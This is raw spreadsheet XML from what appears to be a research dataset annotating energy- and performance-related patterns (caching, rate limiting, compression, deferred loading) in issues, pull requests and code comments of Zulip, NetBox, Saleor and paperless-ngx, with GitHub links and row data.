    <t>I have to ask, why does NetBox even care about how precise numbers stored in the database are? What's the problem it's trying to solve? Unless there's any specific reason NetBox does it this way, It seems the correct approach is to allow storing numbers of arbitrary precision (well, up to the precision of the underlying datatype) and then just doing any rounding on the output side.</t>
  </si>
  <si>
    <t>Hello @jsenecal @jose-d @thefreakquency,. About the power consumption, I'm not an expert but there's a difference between the power supply and the power consumption. Let's take a Dell server, it has 2 x 750W power supplies but my server consume 200W. Sometimes they can consume more. But the datacenters don't bill my power consumption at a certain moment, they allow me to burst a little and then come back to a certain value. I think it's similar to @jose-d use case, we want to insert a value for power consumption, use it to calculate our billing or if the electric system is going to short circuit or how many power capacity left we have in the cabinet. I think the power consumption is define on how you use the server. I also use Cisco switches, for example the Nexus 9372PX has 2 x 650W power supplies, Cisco indicates a 537W maximum power consumption and 210W typical power consumption. Because I don't have a lot of trafic, I would use the 210W power consumption which is different from the value of the power supplies and the maximum power that the switch may consume. For heat dissipation, we need to have an idea on how we should cool down the room as we add or remove devices. I didn't know about the 3.4 factor, thank you @thefreakquency . However it's based on the power consumption of the machine, not the power supplies or the maximum power consumption of the machine. So in my case, I would use that 3.4 factor to calculate the heat dissipation, the approximate value is good enough. If I have 10 servers + switches in a specific room consuming 4500W then I have my value (4500 * 3.4). That emphasize the need to know how much each server consume in Watts. For heat dissipation, in my "dreams", there would be a suggested value that is calculated using the power consumption * 3..4 and that field is not modifiable by the user. Next to that field a tick box to make a manual input, if you tick that box you are allowed to enter any value that you want. Then in API I can retrieve a</t>
  </si>
  <si>
    <t>does not recompute</t>
  </si>
  <si>
    <t>Following up on this rather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t>
  </si>
  <si>
    <t>ring a. conversation view, most importantly when opening a direct message. conversation. - Fixed a minor bug in the organization settings UI. - Improved rate-limiting logic to avoid errors when loading the app for some users. - Adjusted memory usage configuration to reduce memory usage to avoid. OOM kills on systems with close to 4GiB of RAM, and require less. tuning for larger systems. - Upgraded dependencies. - Updated translations. ### Zulip Server 8.1. _Released 2024-01-24_. - CVE-2024-21630: Zulip version 8.0 and its betas had a bug affecting. an unlikely permissions configuration where some user roles had. permission to create reusable invitation links to join the. organization, but lacked the permission to subscribe other users to. streams. A user with such a role could incorrectly create an. invitation link that subscribes new users to streams. This. vulnerability is similar to CVE-2023-32677, but applies to multi-use. invitations, not single-user invites. - Fixed a fault-tolerance bug, where failing outgoing email. authentication could cause other queue workers to not progress. properly on low-memory Zulip servers. - Added support for using PostgreSQL 16 as the database. See the. [PostgreSQL upgrade. documentation](../production/upgrade.md#upgrading-postgresql) if. you’re interested in upgrading an existing server to newer. PostgreSQL. - Added support for explicitly deactivating a mobile push. notifications registration. - Added support for a new class of custom authentication hook. - Improved the workflow for sending password reset emails to users. imported from another chat app. - Improved the file uploads integration to be compatible with S3. alternatives that use a different URL addressing style. - Improved the Terms of Service/Privacy Policy settings if no policies. sidebar is configured. - Fixed a bug preventing the incoming email integration from. mentioning groups that everyone is allowed to mention. - Fixed the data import tool crashing when proces</t>
  </si>
  <si>
    <t>Return early if the upgrade request failed.</t>
  </si>
  <si>
    <t>TODO: test rounding down microseconds</t>
  </si>
  <si>
    <t>returned early</t>
  </si>
  <si>
    <t>Failures should be returned early so the caller can assert about them.</t>
  </si>
  <si>
    <t>The -1 fudge factor is important here due to rounding errors. Better to err on the side of not scrolling.</t>
  </si>
  <si>
    <t>Important: Do not return early if we receive 0 rows; we must updated last_audit_log_update even if there are no new rows, to help identify server whose ability to connect to this endpoint is broken by a networking problem.</t>
  </si>
  <si>
    <t>Simulate Cordelia still has an actively polling client, but the lack of presence info should still mark her as offline. Despite Cordelia being offline, we still short circuit offline notifications due to the her stream push setting.</t>
  </si>
  <si>
    <t>Currently we assume that if this flag is set to True, then the user already was notified about the earlier message, so we short circuit. We may handle this more rigorously in the future by looking at something like an AlreadyNotified model.</t>
  </si>
  <si>
    <t>After the validation, we are sure that there is nothing to do. Return early to avoid flushing the cache and populating the audit logs.</t>
  </si>
  <si>
    <t>We can return early if users are already subscribed to all the streams.</t>
  </si>
  <si>
    <t>Optimization: Currently, only include_owner_subscribed has the ability to add additional results to content_access_streams. We return early to save us a database query down the line if we do not need to add include_owner_subscribed filter.</t>
  </si>
  <si>
    <t>Set value that will be used to short circuit the after_query altogether and avoid needless conditions in the before_query.</t>
  </si>
  <si>
    <t>memoized</t>
  </si>
  <si>
    <t>Limit unread messages for performance reasons. We do this inside a CTE, such that the join to Recipients, below, can't be implied to remove rows, and thus allows a Nested Loop join, potentially memoized to reduce the number of Recipient lookups.</t>
  </si>
  <si>
    <t>If a topic has a visibility policy set, it can't be the case of initiation. We return early, thus saving a DB query.</t>
  </si>
  <si>
    <t>If only DMs are relevant, return early here.</t>
  </si>
  <si>
    <t>We are going to short circuit this iteration as its no use iterating since user unsubscribed before soft-deactivation</t>
  </si>
  <si>
    <t>We are taking advantage of logical AND short circuiting here since we need the else statement below.</t>
  </si>
  <si>
    <t>3 days before the end of the trial, plus a little bit to make sure the rounding is working</t>
  </si>
  <si>
    <t>EXTERNAL_AUTH_METHODS is already sorted in the correct order, so we don't need to worry about sorting here.</t>
  </si>
  <si>
    <t>prepare the checkout with line prices and discount value that might result in rounding issues</t>
  </si>
  <si>
    <t>Apply taxes to undiscounted base price. This function also prevents rounding difference between prices from tax-app and local calculations based on tax_rate that might occur in orders without discounts.</t>
  </si>
  <si>
    <t>Test checking that a rounding issue may appear in calculations. We want to test a scenario where a percentage promotion is applied to each line separately, resulting in a total discount that is different from applying the same percentage sale to the sum of qualified lines. In the current solution the discount from promotion is applied on the variant price, and then the prices for each line are summed up If we calculate 10% discount we got: +-------+-------------+------------------+----------------------+ | Line | Line total | Discount applied | Discount applied on | | | | on total price | each line separately | +-------+-------------+------------------+----------------------+ | Line1 | 1.06 | 0.11 | 0.11 | | Line2 | 2.06 | 0.2 | 0.21 | | Line3 | 3.06 | 0.31 | 0.31 | | Line4 | 4.06 | 0.4 | 0.41 | +-------+-------------+------------------+----------------------+ | Sum | 10.24 | 1.02 | 1.04 | +-------+-------------+------------------+----------------------+</t>
  </si>
  <si>
    <t>epsilon</t>
  </si>
  <si>
    <t>Because rank is float number, it gets mangled by PostgreSQL's query parser making equal comparisons impossible. Instead we compare rank against small range of values, constructed using epsilon.</t>
  </si>
  <si>
    <t>](https://github.com/netbox-community/netbox/issues/12865)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 ---. ## v3.5.3 (2023-06-02). ### Enhancements. * [#9876](https://github.com/netbox-community/netbox/issues/9876) - Improve support for matching tags in conditional rules. * [#12015](https://github.com/netbox-community/netbox/issues/12015) - Add device type &amp; role filters for device components. * [#12470](https://github.com/netbox-community/netbox/issues/12470) - Collapse context data by default when viewing a rendered device configuration. * [#12</t>
  </si>
  <si>
    <t>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 ---. ## v3.7.6 (2024-04-22). !!! warning. If remote authentication is in use with Gunicorn v22.0 or later, it may</t>
  </si>
  <si>
    <t>! @emotion/memoize</t>
  </si>
  <si>
    <t>A memoized collection of relevant subfields with regard to the return type. Memoizing ensures the subfields are not repeatedly calculated, which saves overhead when resolving lists of values.</t>
  </si>
  <si>
    <t>Return early errors if execution context failed.</t>
  </si>
  <si>
    <t>Int8Array</t>
  </si>
  <si>
    <t>Returns true if the provided object is an Object (i.e. not a string literal) and implements the Iterator protocol. This may be used in place of [Array.isArray()][isArray] to determine if an object should be iterated-over e.g. Array, Map, Set, Int8Array, TypedArray, etc. but excludes string literals. @example ```ts isIterableObject([ 1, 2, 3 ]) // true isIterableObject(new Map()) // true isIterableObject('ABC') // false isIterableObject({ key: 'value' }) // false isIterableObject({ length: 1, 0: 'Alpha' }) // false ```</t>
  </si>
  <si>
    <t>Memoizes</t>
  </si>
  <si>
    <t>Memoizes the provided three-argument function.</t>
  </si>
  <si>
    <t>Memoize</t>
  </si>
  <si>
    <t>Memoize so two fragments are not compared for conflicts more than once.</t>
  </si>
  <si>
    <t>nn</t>
  </si>
  <si>
    <t>cache, rate_limit</t>
  </si>
  <si>
    <t>https://github.com/zulip/zulip/blob/11.2/zerver/lib/rate_limiter.py</t>
  </si>
  <si>
    <t>testfile for throttling behavior -&gt; looked for the corresponding implementation manually in the code</t>
  </si>
  <si>
    <t>references same relevant file as other match</t>
  </si>
  <si>
    <t>false_positive</t>
  </si>
  <si>
    <t>push notification metrics</t>
  </si>
  <si>
    <t>auto throttle and download delay are commented out here -&gt; antipattern</t>
  </si>
  <si>
    <t>decrease_rate</t>
  </si>
  <si>
    <t>sth fails bc of GitHub ratelimiting</t>
  </si>
  <si>
    <t>RateLimitedError</t>
  </si>
  <si>
    <t>registers push devices and sends updates via push services instead of clients polling (probably hard to constrcut the antipattern)</t>
  </si>
  <si>
    <t>push_over_poll</t>
  </si>
  <si>
    <t>tests rate limiting of an endpoint, but that traces back to the same rate limiter as in previous matches</t>
  </si>
  <si>
    <t>tests use zerver.decorator.rate_limit_user unless skip_rate_limiting=True (maybe i can disable it to construct an antipattern)</t>
  </si>
  <si>
    <t>double match</t>
  </si>
  <si>
    <t>tests again the same rate limit implementation as previous matches</t>
  </si>
  <si>
    <t xml:space="preserve">avoid polluting </t>
  </si>
  <si>
    <t>simulate rate limit from external api</t>
  </si>
  <si>
    <t>tests that rate limit is reset correctly after successful login</t>
  </si>
  <si>
    <t>tests rate limit rules</t>
  </si>
  <si>
    <t>resets the rate limit</t>
  </si>
  <si>
    <t xml:space="preserve">decrease_rate, cache </t>
  </si>
  <si>
    <t>this file is  where you can override a per-user/bot API rate limit (this is used by the rate limiter from above). Cache pattern: maybe_get_user_profile_by_api_key: If the API key is valid → cache the UserProfile.) If the API key is invalid → instead of just failing, it caches None. the next request with the same bad key doesn’t even hit the database. The system instantly returns None from cache -&gt; save extra work</t>
  </si>
  <si>
    <t>avoid pollute</t>
  </si>
  <si>
    <t>provides test helpers that validate the schema of events sent by Zulip’s server-to-client push system, ensuring all pushed events have the correct structure and types. References server push logic, however its probably hard to change this logic</t>
  </si>
  <si>
    <t>antipattern, skip rate limiting in some cases</t>
  </si>
  <si>
    <t>double match, this is the file that implements rate limiting that has been referenced by previous matches</t>
  </si>
  <si>
    <t>test helpers</t>
  </si>
  <si>
    <t>uses gzip to compress HTTP responses before they are sent to the client</t>
  </si>
  <si>
    <t>network_compression</t>
  </si>
  <si>
    <t xml:space="preserve"> tests  throttling mechanism for login attempts. After an invalid login, the server blocks the next attempt by writing a flag to cache (get_cache_key_blocked_ip(ip)), forcing time between requests until the cache entry expires</t>
  </si>
  <si>
    <t>Focuses on memory management and garbage collection correctness</t>
  </si>
  <si>
    <t>reduce_size</t>
  </si>
  <si>
    <t>reduce_size, cache</t>
  </si>
  <si>
    <t>https://github.com/zulip/zulip/pull/392/commits, https://github.com/zulip/zulip/pull/392/commits, https://github.com/zulip/zulip/pull/442/commits</t>
  </si>
  <si>
    <t>first PR implements different performance improvements like Limit DevAuthBackend user list display to 100 users. Second PR implements cache. Third PR removes some unneccessary calls</t>
  </si>
  <si>
    <t>no code, keyword just mentioned in code example within issue</t>
  </si>
  <si>
    <t>discussing docs</t>
  </si>
  <si>
    <t>discussing test coverage</t>
  </si>
  <si>
    <t>https://github.com/zulip/zulip/pull/2002/commits, https://github.com/SmartPeople/zulip/commit/7856ccace40238c0f1f5f238e4c70d3f8db8794e</t>
  </si>
  <si>
    <t>adds websocket support</t>
  </si>
  <si>
    <t>relevant since its about a test that tests rate limiting. Have found this code already in code comments</t>
  </si>
  <si>
    <t>Minification (compress + mangle) reduces the JavaScript bytes sent to clients</t>
  </si>
  <si>
    <t>https://github.com/zulip/zulip/pull/2920/commits/7491787c0aa679c4322e50fcb1dd261e0e00d08b</t>
  </si>
  <si>
    <t>relevant but no code referenced</t>
  </si>
  <si>
    <t>mentions a relevant file but no PR associated</t>
  </si>
  <si>
    <t>accept encoding</t>
  </si>
  <si>
    <t xml:space="preserve"> </t>
  </si>
  <si>
    <t>https://github.com/netbox-community/netbox/commit/bd8b239e157ed919287f0a904e865e8af4ca71a0</t>
  </si>
  <si>
    <t>reduces amount of data rendered and transmitted to client. This match might be missed by looking at PR only</t>
  </si>
  <si>
    <t>cache</t>
  </si>
  <si>
    <t>https://github.com/netbox-community/netbox/pull/4122/commits</t>
  </si>
  <si>
    <t>PR adds NaturalOrderingField and stores a precomputed _name used for ordering</t>
  </si>
  <si>
    <t>no code associated</t>
  </si>
  <si>
    <t>no code referenced</t>
  </si>
  <si>
    <t>no code referenced and closed without much activity</t>
  </si>
  <si>
    <t>closed without much activity, no code</t>
  </si>
  <si>
    <t>in example config file they set gzip: on</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri (Textkörper)"/>
      </rPr>
      <t>Before this change, the API returned </t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri (Textkörper)"/>
      </rPr>
      <t>all</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri (Textkörper)"/>
      </rPr>
      <t> available VLANs (up to 4094 entries). This PR allows clients to request only what they need — e.g., ?limit=10</t>
    </r>
  </si>
  <si>
    <t>https://github.com/netbox-community/netbox/pull/10044/commits/d160a02c854dff8c4b04e687073173b0182cc2d7</t>
  </si>
  <si>
    <t>gzip in nginx config</t>
  </si>
  <si>
    <t>introduces HTMX support in ObjectEditView, allowing partial page updates and dynamic, on-demand rendering of form elements instead of rendering the entire form upfront</t>
  </si>
  <si>
    <t>https://github.com/netbox-community/netbox/commit/a0e4019c0529b5d4cc6a9f028bc78c9e6f6d3f21, https://github.com/netbox-community/netbox/commit/0965c69c731832d016cd2d0ff0d3286079b662af</t>
  </si>
  <si>
    <t>avoid_extraneous_graphics</t>
  </si>
  <si>
    <t>accept_encoding</t>
  </si>
  <si>
    <t>achieves the goal of preventing task floods, but by expiring old tasks rather than throttling task creation</t>
  </si>
  <si>
    <t>https://github.com/paperless-ngx/paperless-ngx/pull/2614/commits/ff991ea99d7b74d7048623235324d9cf609f000e</t>
  </si>
  <si>
    <t>rate_limit</t>
  </si>
  <si>
    <t>very relevant but no PRs</t>
  </si>
  <si>
    <t>https://github.com/paperless-ngx/paperless-ngx/pull/4390/commits/a5be8eeb18e3aebe6fdff2874919025a704669bc</t>
  </si>
  <si>
    <t>It switches static storage to whitenoise.storage.CompressedStaticFilesStorage (except on aarch64), which pre-compresses assets during collectstatic and serves the .gz/.br files directly</t>
  </si>
  <si>
    <t>github api rate limit</t>
  </si>
  <si>
    <t>no code</t>
  </si>
  <si>
    <t>reduce size: https://github.com/saleor/saleor/pull/530/commits/8fbe3824df8e9dd53e3ef7ad08b593fe129d0108, https://github.com/saleor/saleor/pull/530/commits/2601c7921e0c49e9f3f37dbae62faf1d78d68e4e, offload to cloud: https://github.com/saleor/saleor/pull/530/commits/985574bb74c74d3bdbc61bd1e96a755f5a1de2f8</t>
  </si>
  <si>
    <t>reduce_size, offload_to_cloud</t>
  </si>
  <si>
    <t>compressing and bundling static assets to lower payload size, replacing local and custom storage with Django’s S3-backed storage (django-storages)</t>
  </si>
  <si>
    <t>https://github.com/saleor/saleor/pull/11833/commits/54ed34ec0e56d5bbf611d14155c09d5e1df210bd</t>
  </si>
  <si>
    <t>adding native gzip compression middleware that automatically compresses large HTTP responses in the ASGI layer</t>
  </si>
  <si>
    <t>https://github.com/saleor/saleor/pull/12536/commits/35654d55784cafad68dccf514178cc8aa436bab3</t>
  </si>
  <si>
    <t>batch_operations</t>
  </si>
  <si>
    <t>collecting all required model identifiers from the input and fetching their instances in a single query per model, thereby reducing the number of individual API/database calls needed to create multiple orders</t>
  </si>
  <si>
    <t>enough_resolution</t>
  </si>
  <si>
    <t>migration converts encrypted PNG thumbnails to WebP and also strips metadata, removes alpha, and scales the image</t>
  </si>
  <si>
    <t>reduced motion setting</t>
  </si>
  <si>
    <t>disable autoplay of background videos</t>
  </si>
  <si>
    <t>With exitBeforeEnter the code defers rendering incoming children until all exiting animations finish. That prevents overlapping animations and extra renders, reducing layout/paint work and GPU/CPU usage</t>
  </si>
  <si>
    <t>relevant discussion but theres no actual code relevant for the pattern</t>
  </si>
  <si>
    <t>https://github.com/zulip/zulip/pull/13328/commits/2fc50a16bde2dfdcceb6c39d437081f77211edd2</t>
  </si>
  <si>
    <t>adding resized, lower-resolution images</t>
  </si>
  <si>
    <t>https://github.com/zulip/zulip/pull/35258/commits, https://github.com/zulip/zulip/pull/20464/commits</t>
  </si>
  <si>
    <t>add feature to disable animated emojis</t>
  </si>
  <si>
    <t>goal is to avoid rendering irrelevant UI elements that consume pixels, processing, and energy</t>
  </si>
  <si>
    <t>https://github.com/netbox-community/netbox/commit/b7309d5c695a798e2e611a2f650df9a871065053</t>
  </si>
  <si>
    <t>defers loading API-backed form fields until the user opens them.</t>
  </si>
  <si>
    <t>https://github.com/netbox-community/netbox/pull/8185/commits/9c9fcaf42fb03f7bf08708c27f7d4b90254dd663</t>
  </si>
  <si>
    <t>defer_loading</t>
  </si>
  <si>
    <t>compresses pngs</t>
  </si>
  <si>
    <t>https://github.com/zulip/zulip/pull/604/commits/587a9e840cbb3deada15fc6101497405beb19820</t>
  </si>
  <si>
    <t>https://github.com/zulip/zulip/pull/901/commits/26f18a817137bc0a4ca6d4134726baece8bd3a7f</t>
  </si>
  <si>
    <t>defers loading the zxcvbn.js password strength library until needed</t>
  </si>
  <si>
    <t>double match, found by previous matches</t>
  </si>
  <si>
    <t>https://github.com/pratik-pc/zulip/commit/30ad67aa5f6c4697629e834ed8b71b6271573e60</t>
  </si>
  <si>
    <t xml:space="preserve">actually not about extraneous graphics but more about deferring rendering </t>
  </si>
  <si>
    <t>https://github.com/saleor/saleor/pull/4795/commits/1fef77855e36d7bb02f9aca86e5a414fedde5c58</t>
  </si>
  <si>
    <t>enough_resolution, reduce_size</t>
  </si>
  <si>
    <t>https://github.com/paperless-ngx/paperless-ngx/pull/1127/commits</t>
  </si>
  <si>
    <t>switching document thumbnails from PNG to WebP</t>
  </si>
  <si>
    <t>relevant but no relevant code</t>
  </si>
  <si>
    <t>no relevant code</t>
  </si>
  <si>
    <t xml:space="preserve">double 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</si>
</sst>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color theme="6" tint="-0.499984740745262"/>
      <name val="Calibri (Textkörper)"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF000000"/>
      <name val="Calibri (Textkörper)"/>
    </font>
    <font>
      <i/>
      <sz val="11"/>
      <color rgb="FF000000"/>
      <name val="Calibri (Textkörpe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3" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment wrapText="1"/>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zulip/zulip/pull/392/comm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8"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <pane ySplit="1" topLeftCell="A405" activePane="bottomLeft" state="frozen"/>
      <selection pane="bottomLeft" activeCell="E369" sqref="E369"/>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0</v>
      </c>
      <c r="B2" t="s">
        <v>8</v>
      </c>
      <c r="C2" t="s">
        <v>9</v>
      </c>
      <c r="D2" t="s">
        <v>10</v>
      </c>
      <c r="E2" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/16", "https://github.com/zulip/zulip/issues/16")</f>
        <v>https://github.com/zulip/zulip/issues/16</v>
      </c>
      <c r="F2" t="s">
        <v>815</v>
      </c>
    </row>
    <row r="3" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A3">
        <v>2</v>
      </c>
      <c r="B3" t="s">
        <v>11</v>
      </c>
      <c r="C3" t="s">
        <v>12</v>
      </c>
      <c r="D3" t="s">
        <v>10</v>
      </c>
      <c r="E3" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/227", "https://github.com/zulip/zulip/pull/227")</f>
        <v>https://github.com/zulip/zulip/pull/227</v>
      </c>
      <c r="F3" t="s">
        <v>815</v>
      </c>
    </row>
    <row r="4" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A4">
        <v>4</v>
      </c>
      <c r="B4" t="s">
        <v>13</v>
      </c>
      <c r="C4" t="s">
        <v>14</v>
      </c>
      <c r="D4" t="s">
        <v>10</v>
      </c>
      <c r="E4" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/302", "https://github.com/zulip/zulip/issues/302")</f>
        <v>https://github.com/zulip/zulip/issues/302</v>
      </c>
      <c r="F4" t="s">
        <v>815</v>
      </c>
    </row>
    <row r="5" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A5">
        <v>5</v>
      </c>
      <c r="B5" t="s">
        <v>15</v>
      </c>
      <c r="C5" t="s">
        <v>16</v>
      </c>
      <c r="D5" t="s">
        <v>10</v>
      </c>
      <c r="E5" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/375", "https://github.com/zulip/zulip/issues/375")</f>
        <v>https://github.com/zulip/zulip/issues/375</v>
      </c>
      <c r="F5" s="4" t="s">
        <v>844</v>
      </c>
      <c r="G5" s="3" t="s">
        <v>845</v>
      </c>
      <c r="H5" s="5" t="s">
        <v>846</v>
      </c>
    </row>
    <row r="6" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A6">
        <v>6</v>
      </c>
      <c r="B6" t="s">
        <v>17</v>
      </c>
      <c r="C6" t="s">
        <v>18</v>
      </c>
      <c r="D6" t="s">
        <v>10</v>
      </c>
      <c r="E6" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/452", "https://github.com/zulip/zulip/issues/452")</f>
        <v>https://github.com/zulip/zulip/issues/452</v>
      </c>
      <c r="F6" t="s">
        <v>815</v>
      </c>
      <c r="H6" t="s">
        <v>847</v>
      </c>
    </row>
    <row r="7" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A7">
        <v>7</v>
      </c>
      <c r="B7" t="s">
        <v>17</v>
      </c>
      <c r="C7" t="s">
        <v>19</v>
      </c>
      <c r="D7" t="s">
        <v>10</v>
      </c>
      <c r="E7" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/453", "https://github.com/zulip/zulip/issues/453")</f>
        <v>https://github.com/zulip/zulip/issues/453</v>
      </c>
      <c r="F7" t="s">
        <v>815</v>
      </c>
      <c r="H7" t="s">
        <v>848</v>
      </c>
    </row>
    <row r="8" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A8">
        <v>8</v>
      </c>
      <c r="B8" t="s">
        <v>8</v>
      </c>
      <c r="C8" t="s">
        <v>20</v>
      </c>
      <c r="D8" t="s">
        <v>10</v>
      </c>
      <c r="E8" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/735", "https://github.com/zulip/zulip/issues/735")</f>
        <v>https://github.com/zulip/zulip/issues/735</v>
      </c>
      <c r="F8" t="s">
        <v>815</v>
      </c>
    </row>
    <row r="9" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A9">
        <v>9</v>
      </c>
      <c r="B9" t="s">
        <v>17</v>
      </c>
      <c r="C9" t="s">
        <v>21</v>
      </c>
      <c r="D9" t="s">
        <v>10</v>
      </c>
      <c r="E9" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/1000", "https://github.com/zulip/zulip/issues/1000")</f>
        <v>https://github.com/zulip/zulip/issues/1000</v>
      </c>
      <c r="F9" t="s">
        <v>815</v>
      </c>
      <c r="H9" t="s">
        <v>849</v>
      </c>
    </row>
    <row r="10" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A10">
        <v>10</v>
      </c>
      <c r="B10" t="s">
        <v>22</v>
      </c>
      <c r="C10" t="s">
        <v>23</v>
      </c>
      <c r="D10" t="s">
        <v>10</v>
      </c>
      <c r="E10" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/1036", "https://github.com/zulip/zulip/issues/1036")</f>
        <v>https://github.com/zulip/zulip/issues/1036</v>
      </c>
      <c r="F10" t="s">
        <v>822</v>
      </c>
      <c r="G10" t="s">
        <v>850</v>
      </c>
      <c r="H10" t="s">
        <v>851</v>
      </c>
    </row>
    <row r="11" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A11">
        <v>11</v>
      </c>
      <c r="B11" t="s">
        <v>24</v>
      </c>
      <c r="C11" t="s">
        <v>25</v>
      </c>
      <c r="D11" t="s">
        <v>10</v>
      </c>
      <c r="E11" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/1036", "https://github.com/zulip/zulip/issues/1036")</f>
        <v>https://github.com/zulip/zulip/issues/1036</v>
      </c>
      <c r="F11" t="s">
        <v>822</v>
      </c>
      <c r="H11" t="s">
        <v>825</v>
      </c>
    </row>
    <row r="12" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A12">
        <v>12</v>
      </c>
      <c r="B12" t="s">
        <v>26</v>
      </c>
      <c r="C12" t="s">
        <v>27</v>
      </c>
      <c r="D12" t="s">
        <v>10</v>
      </c>
      <c r="E12" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/1036", "https://github.com/zulip/zulip/issues/1036")</f>
        <v>https://github.com/zulip/zulip/issues/1036</v>
      </c>
      <c r="F12" t="s">
        <v>822</v>
      </c>
      <c r="H12" t="s">
        <v>825</v>
      </c>
    </row>
    <row r="13" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A13">
        <v>14</v>
      </c>
      <c r="B13" t="s">
        <v>8</v>
      </c>
      <c r="C13" t="s">
        <v>28</v>
      </c>
      <c r="D13" t="s">
        <v>10</v>
      </c>
      <c r="E13" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/2239", "https://github.com/zulip/zulip/issues/2239")</f>
        <v>https://github.com/zulip/zulip/issues/2239</v>
      </c>
      <c r="F13" t="s">
        <v>815</v>
      </c>
      <c r="H13" t="s">
        <v>852</v>
      </c>
    </row>
    <row r="14" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A14">
        <v>15</v>
      </c>
      <c r="B14" t="s">
        <v>29</v>
      </c>
      <c r="C14" t="s">
        <v>30</v>
      </c>
      <c r="D14" t="s">
        <v>10</v>
      </c>
      <c r="E14" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/2290", "https://github.com/zulip/zulip/issues/2290")</f>
        <v>https://github.com/zulip/zulip/issues/2290</v>
      </c>
      <c r="F14" t="s">
        <v>815</v>
      </c>
    </row>
    <row r="15" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A15">
        <v>17</v>
      </c>
      <c r="B15" t="s">
        <v>31</v>
      </c>
      <c r="C15" t="s">
        <v>32</v>
      </c>
      <c r="D15" t="s">
        <v>10</v>
      </c>
      <c r="E15" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/2920", "https://github.com/zulip/zulip/pull/2920")</f>
        <v>https://github.com/zulip/zulip/pull/2920</v>
      </c>
      <c r="F15" t="s">
        <v>843</v>
      </c>
      <c r="G15" t="s">
        <v>854</v>
      </c>
      <c r="H15" s="5" t="s">
        <v>853</v>
      </c>
    </row>
    <row r="16" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A16">
        <v>18</v>
      </c>
      <c r="B16" t="s">
        <v>11</v>
      </c>
      <c r="C16" t="s">
        <v>33</v>
      </c>
      <c r="D16" t="s">
        <v>10</v>
      </c>
      <c r="E16" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/3211", "https://github.com/zulip/zulip/issues/3211")</f>
        <v>https://github.com/zulip/zulip/issues/3211</v>
      </c>
      <c r="F16" t="s">
        <v>815</v>
      </c>
      <c r="H16" t="s">
        <v>855</v>
      </c>
    </row>
    <row r="17" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A17">
        <v>20</v>
      </c>
      <c r="B17" t="s">
        <v>34</v>
      </c>
      <c r="C17" t="s">
        <v>35</v>
      </c>
      <c r="D17" t="s">
        <v>10</v>
      </c>
      <c r="E17" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/3287", "https://github.com/zulip/zulip/pull/3287")</f>
        <v>https://github.com/zulip/zulip/pull/3287</v>
      </c>
      <c r="F17" t="s">
        <v>815</v>
      </c>
    </row>
    <row r="18" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A18">
        <v>21</v>
      </c>
      <c r="B18" t="s">
        <v>8</v>
      </c>
      <c r="C18" t="s">
        <v>36</v>
      </c>
      <c r="D18" t="s">
        <v>10</v>
      </c>
      <c r="E18" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/3330", "https://github.com/zulip/zulip/pull/3330")</f>
        <v>https://github.com/zulip/zulip/pull/3330</v>
      </c>
      <c r="F18" t="s">
        <v>815</v>
      </c>
    </row>
    <row r="19" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A19">
        <v>22</v>
      </c>
      <c r="B19" t="s">
        <v>8</v>
      </c>
      <c r="C19" t="s">
        <v>37</v>
      </c>
      <c r="D19" t="s">
        <v>10</v>
      </c>
      <c r="E19" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/3471", "https://github.com/zulip/zulip/issues/3471")</f>
        <v>https://github.com/zulip/zulip/issues/3471</v>
      </c>
      <c r="F19" t="s">
        <v>815</v>
      </c>
      <c r="H19" t="s">
        <v>856</v>
      </c>
    </row>
    <row r="20" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A20">
        <v>23</v>
      </c>
      <c r="B20" t="s">
        <v>38</v>
      </c>
      <c r="C20" t="s">
        <v>39</v>
      </c>
      <c r="D20" t="s">
        <v>10</v>
      </c>
      <c r="E20" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/3638", "https://github.com/zulip/zulip/issues/3638")</f>
        <v>https://github.com/zulip/zulip/issues/3638</v>
      </c>
    </row>
    <row r="21" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A21">
        <v>25</v>
      </c>
      <c r="B21" t="s">
        <v>40</v>
      </c>
      <c r="C21" t="s">
        <v>41</v>
      </c>
      <c r="D21" t="s">
        <v>10</v>
